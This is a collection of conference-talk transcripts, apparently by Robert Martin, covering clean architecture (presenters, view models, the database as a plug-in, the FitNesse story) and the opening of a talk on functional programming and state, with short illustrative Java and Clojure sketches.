controllers. It will pass into those controllers the arguments and the data that came from the web. Those controllers will then reach over and start yelling at the business objects, telling the business objects what to do. Then they'll gather the data from the business objects and talk to the views. The views will then reach back into the business objects and gather a bunch of data out of them and present them. What you wind up with are business objects that get polluted with controller-like functions and with view-like functions. It's hard to know where to put the different functions. Sometimes they go into the business object when they really shouldn't. How can we deal with the output side? Here I show you the Interactor. The Interactor has done its work. It's gathered the data from the entities, the job of the use cases done, the response model has been built. We're about to pass the response model out through the output boundary. What implements that output boundary? Something called a presenter. The job of the presenter is to take that response model, which, remember, is a pure data structure. 
To translate it into yet another pure data structure, which we could call a view model. The view model is a model of the output, the representation of the output. It's still a data structure. But if there is a table on the screen, there will be a table in that data structure. If there is a text field on the screen, there will be a text field in that data structure. If the numbers on the screen need to be trimmed to two decimal places, they will be trimmed to do two decimal places and converted into strings in the view model. If they need to have parentheses around them, if they're negative, those parentheses will have been put on them by the presenter and put into the view model. If there are menu items, the names of those menu items are in the view model. If some of those menu items need to be grayed out because they're inactive, there are booleans in the view model that tell you that they should be grayed out. Anything displayable is represented in the view model data structure in a displayable but still abstract way. Then that gets fed to the view. The view is stupid. The view doesn't have anything to do. It just takes all the fields from the view model, puts them wherever they have to go. Boom, boom, boom, boom. No processing, no if statements. There might be a while loop to load up a table, but that's about it. The view is too dumb to worry about. We don't usually even bother about testing the view because we're going to look at it with our eyes anyway. Can you test that presenter? Yeah, you hand it the data structure of the response model and you look to get the view model data structure out. You can test that presenter. Do you need the web server up and running to test the presenter? No. You can test all this stuff without the web server running. You don't have to fire up spring or whatever. God knows other container you've got. You don't need to fire up all this goop. You test all this stuff just like they're little old objects. By the way, that's a goal. You want to test as much as you can test without firing up anything. You don't want to have to start this server, start that server, start this thing, or start that thing which takes 30 seconds or two minutes. You don't want to have to do any of that. You want to just be able to run your tests just like that. Boom, boom, boom, boom. Fast as you can. There's the whole piece from the interactor out. You can see the interactor takes data in from the request model through the input boundary, delivers data through the output boundary, through the response model into the presenter. And now look at that black line. That black line is the line that divides the delivery mechanism from the application. And notice that every arrow crosses that black line pointing towards the application. The application knows nothing about the controller or the presenter. It knows nothing about the web. It knows nothing about what that IO channel is. The IO channel knows about the application. The application does not know about the IO channel. If you were to put them into separate jar files, there would be no dependence from the application jar file upon the web jar file. And that also is a goal. You would like to be able to put them in separate jar files so that you could have a jar file for the web and a jar file for your application. And maybe another jar file for some other IO mechanism. And the only way that you would change IO mechanisms is simply to swap out jar files. Think of the IO mechanism, the web, as a plug-in. How many of you use... 
That was a dotnet shop, isn't it? You guys are all dotnet, aren't you? Who's dotnet? Yeah, yeah, yeah, yeah. What IDE do you use? Yeah. Do you have any plug-ins? So, a plug-in. Which of the two authors, the author of the IDE and the author of the plug-in, which of those two authors knows about the other? The plug-in authors know about the IDE authors. The IDE authors don't know anything about the plug-in authors. Don't care. Which of the two can harm the other? Can the plug-in author harm Visual Studio? Who's using Resharper? Can the Resharper guys, the JetBrains guys, can they harm Visual Studio? Well, they can break it. But can they harm it in a way that the authors of Visual Studio must respond to? The software developers at Microsoft, will they ever respond to JetBrains? No, they don't care about JetBrains. Any developers at Microsoft force the developers at JetBrains to respond to them? Yeah, big time. Now, think about that from your application's point of view. Which parts of your application do you want to be protected from other parts? Which parts do you want to be forced to respond to changes in the other, and which parts do you not want to be forced to change in response to the other? And the answer to that ought to be very, very clear. You would like to protect your business rules from changes to the web. You don't want to protect the web from changes to the business rules. But changes on the website should have no effect at all on the business rule side. That's what that architecture guarantees you, all those dependencies point inwards, towards the application. Keep that in mind, that is the plug-in architecture. Which leads us to the database. What about the database? Is that your view of the database? Do you think of the database as the great God in the center with little minions around the outside being applications? Does anybody have the job function of a DBA? Do we have DBAs in the room? I'm safe, good. Anybody know about the DBAs who lord it over the applications, panned out the schema, make sure that the database is right? Is this how you think about the database? Because here's my point. The database is a detail. It's not architecturally significant. The database is a bucket of bits. It is not an architecturally significant element of your system. It has nothing to do with the business rules. God help you if you are putting business rules into stored procedures. What goes into stored procedures are enhanced queries, their validations, their integrity checks, but not business rules. Why do we have databases? Where did this whole database thing come from? Why is there Oracle? Where did we store all that data? We stored it on spinning disks. Has anybody written a disk driver? Anybody written the software that controls memory in and out of a spinning disk? Nobody. Oh gosh. No, no, no. Yeah, disk driver. What? Diskat. What's good enough? So getting data in and off of a disk is hard. Why is it hard? Because of the way the data is organized on the disk. The way the data is organized on the disk is in these circular tracks. These circular tracks go around the surface of the platter. There can be many platters. There are heads that move in and out to find a track. So you've got to move the head to the right track, then the disk spins around and you've got to read the data off the disk. You try to get to the sector you want. There might be 50 or 60 sectors around the surface of a track. Each of those sectors might have 4K bytes. 
So you've got to wait for the disk to spin around until your sector comes. Then you've got to read that sector, and then you can go into that sector and find the byte you want. That's a pain. And it's slow. And if you don't optimize it, it can take forever to get anything in and off the disk. So we wrote systems that optimized for that particular problem. We call them databases. But something's happened. See my laptop there? My laptop has half a terabyte of solid state memory. It doesn't have a disk. That shouldn't be a surprise to you. Does anybody have a disk in the room? Is there a spinning disk in this room? Oh my God, really? You know, nowadays we don't even think about spinning disks anymore. We think about solid state memory. Oh, we think back in the server room there's probably spinning disks. But they're going away too. You watch over the next few years the spinning disks begin to disappear. Everything gets replaced with RAM. And I said RAM, didn't I? RAM is directly addressable at a byte level. What we are approaching is a virtually infinite amount of directly addressable RAM that is persistent. That's where we're going to be storing our data. And if that's where we're going to be storing our data, why in hell would we want to use SQL to access it? SQL is a pain. Tables are a pain. Wouldn't you rather be following pointers around? Wouldn't you rather be looking things up in hash tables? Isn't that what you do anyway? You read all the tables into memory and then put the data in a better organization so you can actually use it? What if we just left it in that format that we want to use it in? If I were Oracle, I would be scared to death. Because the reason for my existence is disappearing out from under me. The notion of a big database system is beginning to go away. How can I protect my application from this detail? This detail of a database that tends to dominate everything. And I can protect it the same way I protected my application against the web. I draw another one of those nice big, heavy black lines. I make sure all the dependencies cross that line going inwards towards the application. I make the database a plug-in to the application so that I can swap out Oracle with MySQL, or I can yank out MySQL and put in CouchDB, or I can take out CouchDB and put in Datomic, or whatever I wish. I can plug in the database. You may never change the database, but it's nice to be able to, even if you don't have to. How do we do it? Well, it's fairly straightforward. There's another interface up there. I called it here the entity gateway. You probably have one per entity, and the methods in the entity gateway are all the query methods. Anything you might query, there's a function for, a method for. You implement that method down in the entity gateway implementation below the line. That implementation uses the database, whatever it is. Notice that no part of the database manages to leak into the application. Where do the entity objects come from? The entity objects are probably fetched out of the database, although God knows what crazy way they've been spread out into tables. The implementation of the entity gateway will gather the data together, create entity objects, and then pass them across the line. If you get them up above the line, they are real entity objects. Guys using something like Hibernate and Hibernate, some ORM tool. Who's using something like that? Where would that be in this diagram? 
In the implementation below the line, no part of that ORM tool would be known above the line. Are you using those funny little annotations or attributes in your business objects? Get them out of your business objects. You don't want your business objects to know that they are built by Hibernate. Let them be built below the line by somebody who's polluted already by the database concept. Keep your business objects pure. Why? What's an object? I've got time for this. What's an object? An object is a set of public methods. And, well, you're not allowed to know the rest, are you? There might be data in there, but you're not allowed to see it. It's all private, isn't it? From your point of view, an object is a bunch of methods, not a bunch of data. An object is a bunch of methods. An object is about behavior. An object is about business rules. It is not about data. We presume there's data in there somewhere, but we don't know where, and we don't know what form it's in, and we don't want to know. What is a data structure? A data structure is a grouping of well-known data elements, public, visible to everybody, and there are no methods in them. Data structures don't have functions. These two things are the exact opposite of each other. A data structure has visible data and no methods, and an object has visible functions and no visible data. Precisely the opposite. There is no such thing as an ORM. An object-relational mapper can't do it, because what comes out of a database is a data structure, and you cannot map a data structure to an object, because they're completely different things. What's happening here is that the data needed by the entities gets put somewhere, God knows where, and somehow magically passed to an entity that uses it somehow, and I don't care how. Those entities are not constructed by Hibernate. Probably those entities use a bunch of little data structures that Hibernate did construct, but I don't care how. I don't want any knowledge of Hibernate or any other framework to cross that black line. Stuff below the black line can be polluted. Above the black line, no, those are my family jewels. I'm going to keep them protected. Those are my business rules. I'm not going to allow my business rules to be polluted with frameworks. Frameworks. We like our frameworks. We think they're cool. We think frameworks save us a lot of time, and they do. But the authors of frameworks entice us to bind to them. They offer us base classes for us to inherit from. When you inherit from a base class, you marry that class. You bind yourself strongly to that base class. There is no relationship stronger than inheritance. So by deriving from someone else's base class, you are making a huge commitment to them. On the other hand, the framework author is not making any kind of commitment to you. So it's an asymmetric relationship. The framework author gets the benefit of your commitment, but the framework author makes no commitment to you at all. I leave you to make that comparison to yourself. A wise architect does not make that binding. A wise architect looks at the framework cynically, looks at it and says, that framework is out to screw me. That framework wants me to bind to it, and I don't think I'm going to. I think I'm going to put boundaries between my business rules and that framework so that my business rules are not forever tied to Hibernate, or Spring, or God knows what. I will use the framework, but I will use the framework carefully, because the author of the framework does not have my best interests at heart.
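A sketch of what that kind of gateway seam might look like in Java. The names are made up for illustration, and an Order entity like the one discussed above is assumed.

// Above the line: the application sees only this interface and real Order entities.
public interface OrderGateway {
    Order findOrder(String orderId);
    void save(Order order);
}

// Below the line: one plug-in implementation among many. Everything database-flavoured stays here.
public class DatabaseOrderGateway implements OrderGateway {
    public Order findOrder(String orderId) {
        // run whatever query the chosen store needs, copy the row data into a real Order entity,
        // and hand that entity up across the boundary
        return null; // elided in this sketch
    }

    public void save(Order order) {
        // flatten the entity back into whatever tables or documents the plug-in uses
    }
}

Swapping MySQL for Couch, or for flat files, then only touches the implementation below the line. The FitNesse story that follows is exactly this kind of seam, applied to wiki pages.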
Long ago, my son and I and several other people wrote a tool called FitNesse. Does anybody use FitNesse? A bunch of you, good. FitNesse is a tool for writing customer acceptance tests based on a wiki. That's all you need to know. Who invented the wiki? Ward Cunningham. Who's Ward Cunningham? A guy who invented the wiki. He's a lot more than that. Ward Cunningham is one of those gurus of gurus. All the gurus know who Ward Cunningham is. All the guys who go around speaking at conferences like me, we all know who Ward Cunningham is, and we revere him from on high. He's the guy who made the phone call to Erich Gamma, said, you know Erich, you ought to write a book called Design Patterns. This is the guy who mentored Kent Beck, taught him things like pair programming and test-driven development, and agile development. Ward Cunningham is one of those guys that, if you know a lot about the history of software, you think, whoa, he's had his hands into everything. FitNesse is based on two inventions of Ward, the wiki and Fit. I'm not going to describe Fit. I will describe the wiki, however. My son and I and a bunch of other folks decided to write this in Java about 12 years ago, 13 years ago, something like that. We knew we wanted to make a wiki, and so we thought, well, we've got to have a place to store the pages. Let's store them in a database, and what database would that be? Well, back in those days, the only open source database was MySQL, so we decided to put everything in MySQL. We were about to go fire up MySQL and start building a schema, and somebody said, well, you know, we don't really have to do that right yet. We will later, but not right now, because we can get away right now with another problem. That problem is translating wiki text to HTML. That's what a wiki does, takes the funny text that you type into the wiki and turns it into HTML. There was a lot of that translation that we needed to do, so for about three months, we just forgot about the database altogether, and we translated wiki text into HTML. We needed an object for this, which we called a wiki page. You can see it here. We created an abstract class named WikiPage, and we implemented it with something called MockWikiPage. The methods of WikiPage had database-like functions, such as load and save, but they were unimplemented. They didn't do anything. For about three months, we worked that way. Once we had all the translation done, then we said, well, it's time to fire up the database, because now we need to actually store these pages somewhere, and somebody said, well, we don't need to do that yet, because what we could do instead is take these pages and store them in a hash table in RAM. We don't really need to store them on disk, do we? The answer was no, because all we were doing was writing unit tests anyway. So we decided to create another version of the WikiPage called the InMemoryPage, which stored all the data in hash tables. We continued to work for a year, continuing to write more and more of FitNesse, keeping all the data in memory. We actually got all of FitNesse working without ever putting it onto a disk. It was very cool, because all the tests went really fast, and we hadn't had to do the database. On the other hand, it was frustrating, because we would create a bunch of tests, and then shut the computer down, and they'd all be gone. So at some point, we finally said, well, now it's time for the database, let's fire up MySQL.
Michael Feathers was there at the time, and Michael said, well, you don't really have to fire up MySQL yet. All you really need is persistence, and you can get that persistence really cheaply by taking the hash tables and writing them out to flat files. We thought, well, that's kind of ugly, but it'll work for the time being, and then later on, we'll switch it all over to MySQL. So we did that. For another three months, we continued to develop more and more of FitNesse, and that was kind of cool, because we could take it on the road, we could show it to people, we could save pages. It started to work like a real wiki. About three months after that, we said, well, we don't need that database. It's working fine. Flat files are fast enough, it works okay that way. We took that highly significant architectural decision and pushed it off to the end of the planet. We never put that database in, and that's not quite true, actually, somebody else did. A customer of ours came along a little later and said, I've got to have the data in a database. We said, well, why? It's working fine in a flat file. He said, corporate policy, all corporate assets must be in a database. I don't know who they've been talking to, but these database salesmen are pretty convincing. So we said, well, look, if you really need it in a database, here's this structure. All you have to do is create a new derivative called MySqlPage, and everything ought to work fine, and he came back a day later with the whole thing running in MySQL. We used to ship that as a plug-in, but nobody ever used it, so we stopped. Here's an architectural decision that we deferred and deferred and delayed and delayed. We delayed it right off the end of the project. We never did it. Something that we thought we had to do at first. We never did. And that leads to the final principle. A good architecture is an architecture that allows major decisions to be delayed, deferred. The goal of an architect is to not make decisions, to delay those decisions as long as possible so that you have the most information with which to make them. You structure the design and the high-level structure of your code so that all these high-level decisions can be pushed off. Don't tell me that the architecture of your application is a bunch of frameworks. What's the architecture of your application? We're using a SQL server, an MVVM, and a lot of the... But you're not telling me anything. You're telling me the tools. That's not the architecture of your application. The architecture of your application is the use cases. You want your use cases to not know about those tools. You want to be able to defer the use of those tools for as long as possible. You should be able to have the whole application running without ever firing up a database, without ever firing up the web. Or maybe you fire up some gunky little web thing that you can toss together in a day or two just so that you can see some pages without firing up some gigantic framework. Maybe you fire up some dumb little database thing just so that you can see some persistence running without ever having to buy licenses to Oracle and all the nonsense you have to go through to get that running. Next time you have an application to write, think about what you can delay. The architecture of a system should be a plug-in architecture.
Where all of the details, like the UI, the database, and the frameworks, plug in to the use cases, which are the real core of your application. Now, of course, customers are going to want to see web pages. You can still make a plug-in architecture and show them web pages running. You don't have to make a lot of commitments to the frameworks. You can probably put something simple up at first. Or if you want to actually use a real framework, fine, go ahead, but maintain the plug-in structure so that at a moment's notice you can unplug it and plug something else in. And that probably brings me to the end of my talk. I already talked about that earlier. So, thank you all very much for your time. Are there any questions? It's very difficult to see, so I'm going to come down here. Oh, that doesn't help at all. Anybody have any questions? You're going to have to, like, holler, because I won't be able to see your hands up. So, the question is: I am speculating the demise of Oracle and relational databases; what do I suggest will replace them? What an interesting question. It could be nothing more than RAM. Why do you need anything to replace them? If you can organize the data in RAM, and if that RAM is persistent, what else do you need? Oh, but let's say you need something. Okay, what might it look like? Well, who's heard of CQRS? Oh, yeah, a few of you. CQRS, what an interesting idea. If we have an infinite amount of high-speed memory, high-speed RAM, or maybe it's even disk, but who cares? Why would we store the state of anything? Why wouldn't we simply store all the transactions? Instead of storing a bank account, why wouldn't we store the transactions that caused us to create the bank account? The transactions that forced us to change the name in the bank account, or the address in the bank account, or the balance in the bank account? Why wouldn't we store those transactions and reconstruct the state? And you say to yourself, well, that would take a lot of time. Yeah, but we've got lots of processing power. We can do that now. We have almost an infinite amount of processing power and almost an infinite amount of RAM. Why wouldn't we store just the events? I think that's an interesting idea. If we stored just the events, then we would never delete anything. We would never update anything. You know, CRUD: create, read, update, delete. We'd lose the last two letters there. All our applications would be CR: create and read. We would never update. We would never delete. And when you don't update and you don't delete, you don't need transactions. There can't be any concurrent update problems if you're not updating. That's interesting. Are there frameworks out there that allow you to do things like that? There are. There are a number of them out there that are write-only databases. Write once, read many times. You can find them on the web. I'm not going to tell you their names right now, but you can go out there and look for them. They're out there. You might replace them with something like that. You might replace them with Couch or Mongo, or you might create some other thing. It really doesn't matter much. You don't have to have some massive vendor offering from some gigantic company in the sky that blesses you and says, yes, son, you may use my database system. Maybe you can just make your own. Not that hard. Anybody else? Yeah, that actually helps a lot. Okay. Anybody else with a question?
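A minimal sketch of the append-only idea just described, in plain Java; the class names are illustrative and not taken from any particular event-sourcing framework.

import java.util.ArrayList;
import java.util.List;

// One event: a signed amount against an account. Positive is a deposit,
// negative a withdrawal. Nothing here is ever updated or deleted.
class Transaction {
    final String account;
    final long amount;
    Transaction(String account, long amount) { this.account = account; this.amount = amount; }
}

class EventStore {
    private final List<Transaction> events = new ArrayList<>();

    public void append(Transaction e) { events.add(e); }               // create
    public List<Transaction> all() { return new ArrayList<>(events); } // read

    // State is never stored; it is reconstructed by replaying the history.
    public long balanceOf(String account) {
        long balance = 0;
        for (Transaction e : all())
            if (e.account.equals(account)) balance += e.amount;
        return balance;
    }
}

Because nothing is ever updated or deleted, the only operations are create and read, which is exactly the point about losing the last two letters of CRUD.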
It doesn't look like it. It doesn't work very well... Deferring decisions does not work very well when... When you have a family. When you have a family. You mean in general. There are decisions you can't defer. For example, what language are we going to write this thing in? You're going to have to make that decision pretty early. You've got to write something. The fact that you're going to have a database, probably something you're going to have to make a decision on pretty early. The fact that it's going to be a web application, you'll probably have to make that fairly early. You'll have to commit to the framework? No. So, if you're going on a family vacation, that's what you were saying here. We could plan out where we were going. Would we have to also plan out which car we would use? If we're planning six months in advance, we might decide to buy a whole new car just for the heck of it. Or maybe our car will break down in the middle, or before we go on the vacation. The car itself is just a vehicle. It doesn't matter as long as our luggage fits in it, and our family. We can still go on the vacation. The database system is like the car. We don't need to make that decision as part of the vacation plan. That one can be deferred till the last minute. You could buy a new car at the last minute, the day before you decided to go on vacation. And why would you do that? You might have gotten a raise. You might have more money. You might have had a baby and you need more space. A lot of reasons why you might want to buy that car at the last minute. Anybody else? Yep, way back there. How do you deal with legacy architecture? Okay, that's going to take me more than a minute. So I'm going to use one word to answer that question and I'll explain that word. Incrementalism. Everybody faced with legacy code wants to throw it away and write it over. Please don't do this. It generally fails horribly. You will spend a tremendous amount of money and waste a load of time. Take little bits of it and rewrite those tiny little bits one at a time and get them working one little bit at a time. That will leave you with a patchwork, but the patchwork will be cleaner than the original. And then start over and start re-implementing the patchwork. Gradually cleaning it, making it better and better. It'll take you a long time. A lot of effort. You want to do that while you're also adding new features. In fact, that's just generally cleaning your code. Please don't try the big redesign. You will get hurt. Thank you all for your attention. I'll see you another time.
|
So we've heard the message about Clean Code. And we've been practicing TDD for some time now. But what about architecture and design? Don't we have to worry about that? Or is it enough that we keep our functions small, and write lots of tests? In this talk, Uncle Bob talks about the next level up. What is the goal of architecture and design? What makes a design clean? How can we evolve our systems towards clean architectures and designs in an incremental Agile way.
|
10.5446/50861 (DOI)
|
And I should be live. Am I live? That's good news to me. Why is there air? Why do we have air? Where did it come from? What's it made of? Who knows what it's made of? Nitrogen and oxygen, almost entirely nitrogen and oxygen. It's about three quarters nitrogen, one quarter oxygen. The actual oxygen percentage is about 21%. There's a little bit of carbon dioxide, about 300 parts per million and growing. There's tiny bits of other gases, but for the most part it's nitrogen and oxygen. Where did the nitrogen come from? How do we have nitrogen, free nitrogen in our atmosphere? Where did that come from? It probably came from ammonia, which is fairly common in the universe at large, especially in molecular clouds. And that probably got ripped apart by sunlight. Where did the oxygen come from? Plants, green plants. Green plants do this. They emit oxygen. And it's a good thing they do because we use that oxygen. The plants use sunlight to gather energy. And the way they store that energy is they tear the oxygen off of carbon. And they put all that energy into the carbon atom. They mix it with a few hydrogens to turn it into sugar. And then they take the sugars and they stack them end to end to turn it into wood. And that's why wood burns, by the way. Wood burns with solar energy. The oxygen ratio in our atmosphere is about 21%, but it was not always so. Before there were plants, there was no free oxygen. And in fact, free oxygen is something you don't expect to find in a planetary atmosphere because oxygen doesn't want to be free. Oxygen combines with things. For example, it combines with iron. If there were any iron anywhere on the surface of the planet or dissolved into the oceans, the oxygen would disappear overnight. It would rust that oxygen, that it would rust that iron away. And in fact, that's what happened for the first three billion years of the history of life on Earth. Every oxygen atom emitted by a plant got grabbed by an iron atom and fell to the bottom of the sea. Because in those days, there was a lot of iron dissolved into the sea. And so this rust, iron oxide, fell like rain down to the bottom of the sea floor, nowadays we call this iron ore. It took three billion years to get rid of all the iron in the oceans. So it was only about a billion years ago that oxygen began to accumulate in our atmosphere. And it accumulated and it accumulated and it accumulated at one point about 250 million years ago. The atmosphere was almost 50% free oxygen. In that kind of an atmosphere, you could sneeze and start a forest fire. The animals grew to enormous size and I'm not talking about the dinosaurs here, I'm talking about dragonflies. There were dragonflies that had six foot wingspans because there was so much oxygen in the air they had plenty of free energy. Eventually that oxygen level tapered down a little bit. Nowadays we have a more rational amount of oxygen in the atmosphere. Although frankly living in a sea of oxygen is fraught with danger, which is why we all have smoke alarms in our houses. But of course this is not what we're supposed to be talking about. The name of the talk I'm going to do today is called functional programming. What, where, when, why, how, or the failure of state. How many of you are functional programmers? Meaning that you program in some nominally functional language like F-SARP? Who's doing F-SARP? Is this a functional language? Who's doing Scala? A few of you. Who's doing some kind of Lispy language? Who's some Lispy languages over here? 
Who's doing a real functional language like Haskell? Nobody. Okay, how about ML? Yeah, nobody. Okay, so fine. I didn't name them all. That's all right. We're going to be talking about functional programming, not a functional programming language. At the end of this talk I'll show you a little bit of closure, which is a Lispy kind of language. This guy's name is Rich Hickey. Who's heard of Rich Hickey? All right, this is the author of the closure language. He is a brilliant speaker. Find some of his talks on YouTube and you will be amazed at what a good speaker he is and the interesting insights he can give you. One of his talks is about state identity and value. Briefly, one is a value. I don't think that's lost on anybody. The next line says that X is an identity, an identifier. And in this case, that identifier identifies the value one. The next line, however, is problematic because it suddenly says that the identifier will identify a value, but you've got no idea what that value is. And the identifier has a state, not a value. And that state can change. The subject of this talk is that state has failed, but how can this fail? A statement like this is so common in our programs, how can we call this a failure? Is that program stateless? Well, from the point of view of the program, it's stateless. It does have an effect. It seems to print something on the screen, but we can ignore that. From the point of view of the internals of this program, there's no state being changed anywhere. So here's an example of a program which does something nominally useful and does not change any state. Here's another program. And probably all of you have written this program at one time in your life. It is the squares of integers program. It prints out the squares of the first 20 integers and what we notice here is a variable that changes state. Now, this looks perfectly normal. What's a for loop for? If you can't change state, right? A for loop changes the state of variables. This works just fine, but it is stateful. It is not stateless. And we're going to talk about why that can be dangerous. Now, can this program be written so that it is stateless? And it can. You could write it that way. It's not particularly useful, but no variable is changing state in here. There's a better way, of course. You could write it that way. This is a recursive algorithm. Print squares calls itself. If it's greater than zero, it continues to call itself. If n is greater than zero, it continues to call itself. And for every iteration, it prints out the square of that particular value of n. No variable changes state here. New variables are introduced. The variable n gets recreated and recreated and recreated, but at no point does any variable change its state. This is a functional program, sort of written in a nonfunctional language, but it is stateless. By the way, how many of you are Java programmers? Some of you, see, I got these big lights in my eyes so I can't see you. Get your hands way up in the air. Java programmers, yeah, there's some of you in here. How many of you are.NET programmers? Hmm. Seems to be a slight bias in this audience. And Java programmers, does your execution platform support recursion well?.NET programmers, does your platform support recursion well? Does it, for example, allow for tail call optimizations? It's an interesting question. The Java runtime does not. 
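For reference, here is roughly how the same squares-of-integers exercise reads in Clojure, the language introduced later in this talk. This is a sketch, not the slide code; loop/recur is Clojure's explicit, constant-stack form of self-recursion, which is how it sidesteps the JVM's lack of tail-call optimization.

;; The squares-of-integers exercise with no assignment anywhere.
(defn print-squares [n]
  (loop [i 1]
    (when (<= i n)
      (println (* i i))
      (recur (inc i)))))

(print-squares 20)

;; Or, with a lazy sequence instead of explicit recursion:
(doseq [i (range 1 21)]
  (println (* i i)))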
The.NET runtime does in some circumstances a program like this, if you were to change this number to say 2 million to print out the first 2 million squares might cause the stack to blow. In fact, this particular function would cause the stack to blow because it's not tail call optimized. So the stack will blow here whereas the original one, the one that was stateful, wouldn't blow the stack on anything. So there's a certain memory usage here. Memory is getting used in an inefficient way if you cannot tail call optimize. By the way, what the heck is it with these platforms?.NET and Java. Why would tail call optimization even be an issue? The year is 2014. This is an optimization that was ended in the 1950s. What's up with our platform people? I think they were kids out of school. Who read this book? Some of you have read this book. All right. Wonderful book. It's free, by the way. You can download it off the web. They give it away now, which I think is remarkable. Along with it, they give away all the video lectures of these two guys. You can watch them teach the computer science course at MIT in the 1980s as they deliver the content of this book. The book is fascinating. I picked it up and read it maybe 10 years ago. I noticed something about this book right away. It makes no apologies. It moves at light speed. You open up the book, you start turning the pages. They hit concept after concept after concept. They don't dittle around. They don't over explain. It just goes boom, boom, boom, boom, very fast. As I was reading it, I was just throwing the pages. It was an exciting book to read if you can think of a computer science book as being exciting. I was excited by this book. I was throwing the pages, reading it. Oh, this is cool. The language inside was Scheme. They don't really explain Scheme, but it doesn't matter because Scheme has almost no syntax, so you can easily infer what these programs do. Page after page after page after page. They're talking about basic algorithms, queuing structures, stacking structures, symbol tables, message passing, all kinds of stuff, tons and tons of code. You get to page 249, I believe it is, and they stop. They apologize for what's about to come. They say, we're sorry now. We're going to have to corrupt our currently very clean view of what a computer is. They go on paragraph after paragraph apologizing for what's about to come, and they introduce an assignment statement. I was thunderstruck. I stopped reading and I stared at this thing, and it made the claim that no assignment statement had been used in any of the previous code in the 249 pages I had read. I had to go back and read that code to look for an assignment statement, and nowhere in there was there an assignment statement. That really fascinated me. I thought, wow, they did that whole first 250 pages with no assignment. Typically in a computer book, the first thing you learn is an assignment statement. They delayed it for 259 pages, and they apologized it for it. I'll tell you why they apologized for it in a minute. Here's how their model of computing worked before they introduced an assignment statement. I will use the squares of integers. You see this function call here. A function call in a functional language can be replaced by its implementation. If I were to take this here and simply stick it there and put the values in, it would still be the same program. Let me show that to you. There we go. I have now taken that first call to print squares, and I've just put the values in. 
But of course, I have to do it again. But I've got to do it again. And I'm simply substituting the function calls for their implementations. If you think about this carefully, you'll realize that that turns in to the very silly implementation that I had put up there before with nothing but the 20 lines that printed the squares of integers. It turns in to almost the same thing except for these cascading ifs. This was the model of computing that that book that I recommended was using for all 249 of its first pages. You could simply replace a function call with its implementation. But when you introduce an assignment statement, that breaks. And this was the apology that they made in the book. Once you introduce assignment, you can no longer replace a function call with its implementation. And why? Because the state of the system may have changed. An assignment statement introduces the concept of time, which is why I show time here in such a warped way. Time becomes important whenever you have an assignment statement. An assignment statement separates the code above the assignment from the code below the assignment in time because the state of the system has changed. In a functional program, that statement will always be true no matter what time it is. The value of f of x will remain the value of f of x no matter what the heck the time is. No external force can change the value of f of x. To put that into a J unit or an N unit, for those of you who are crippled in that way, by the way, who's using N unit? Who's using that other thing? MS test. Stop doing that. Slow, it's complicated. Use N unit. Or there's another one now, x unit, I think, written by the same guy who wrote N unit. Anyway, look at that statement there. Should that statement pass? Should that test pass? If f is functional, that statement will always pass. But if f contains an assignment statement that somehow changes the state of the system, that function could fail. That statement could fail. Imagine staring at that in a test and noting the test failing. What conclusion would you have to come to? You'd have to come to the conclusion that f has a side effect. What's a side effect? A side effect is an assignment statement. All side effects are the result of assignment statements. If there are no assignment statements, there cannot be side effects. Only assignment statements change the state of variables. If there's no assignment, no variable can change its state, and so there cannot be side effects. When you have a function that gives you a side effect, you need another function to undo the side effect. Consider the function open. It opens a file. You need another function, close. To close the file, to undo the side effect. Consider the function malloc, the old C function malloc. That creates a side effect. It allocates memory. You need another function free to undo that side effect. If you seize a semaphore, there's another function to release it, to free it. If you grab a graphical context, there is another function to release it. Functions with side effects are like the sith, always two there are. And they are separated in time. The one must always come before the other, before in time. Malloc must always precede free. Open must always precede close. Close we hope follows open. What happens when you don't do this correctly? Leaks. One of the gross symptoms. Leaks. Has anybody ever had a memory leak? You were using assignment statements. You were using functions that had side effects and so you had a memory leak. 
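One concrete illustration of that pairing problem: in Clojure, the with-open macro takes responsibility for the second half of the open/close pair, so the programmer cannot forget it. A small sketch using the standard clojure.java.io namespace:

(require '[clojure.java.io :as io])

;; with-open performs the closing half of the open/close pair for you,
;; even if an exception is thrown while the file is being read.
(defn first-line [path]
  (with-open [r (io/reader path)]
    (first (line-seq r))))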
What have we done in our languages? To protect us from memory leaks. Garbage collection. The greatest hack ever imposed upon any programmer. Garbage collection. The final admission that we are terrible at dealing with side effects. We've put it into our languages now that we're so bad at dealing with side effects, our languages have to clean up after us because we are incapable of cleaning up after ourselves. That's what side effects do. Unfortunately, we don't have garbage collection for semaphores. We don't have garbage collection for files left open. Maybe some of us do. Many of us don't. We don't have garbage collection for all of the funny functions out there that have side effects. So we still have the problem. We've only introduced this horrible hack of garbage collection in the one case where we can get some control over it. So let me show you an implementation of the bowling game. How many of you bowl? Ten-pin bowling. You don't need to know how to score bowling. It doesn't matter. I'm just going to show you these two implementations. And we'll look at them. One of them is sort of functional and one of them is definitely not functional. And we'll look at the functional one first. This is functional sort of. It's functional if you blur your eyes enough. We begin with a function called a role. This role function allows us to capture the number of pins knocked down by a ball. You would call this function every time you rolled a ball at the pins and you would record into a list the pins that you knocked down. Now you think, well, this is some kind of state change. Not exactly. Each element of this list is being initialized. No value of the list is being changed. There's a variable here called current role. That's definitely getting altered. However, that alteration only exists within the role context. So once I have called a role for the entire game, I don't need to worry about that variable anymore. So this is not perfectly functional, but I can blur my eyes. I can step back from it from a few thousand feet and say, well, it's functional in the sense that once you're done calling role, you don't care about this variable anymore. The list has been built. And then I can process the list. And I can process the list by walking through the list looking at the balls, looking at the roles, and deciding whether or not the roles are a strike or a spare or a non-striker spare, and manipulating some kind of pointer. Once again, this is not perfectly functional because I've got this variable here that gets manipulated. However, once a score returns, all these variables are destroyed. So from the point of view of the call to score and its return, there's no side effect. Internally, there are side effects, but that's a very limited scope. So at a very limited scope, this is not functional. At a wider scope, it is. Or I could do it this way. I've got this enum here. This is the stateful representation. I've got some enum here. It's going to record the state of the system as I roll balls. And here's the role function. The role function attempts to calculate the score in real time. And in order to do that, it's got to store a state variable. And that state variable alters the way this program works from roll to roll to roll to roll. So a call to roll will do something different depending on the state it was left in by the last call to roll. This one is not functional. This one is highly stateful. If I were to put the call to roll here in the first example, it would pass. 
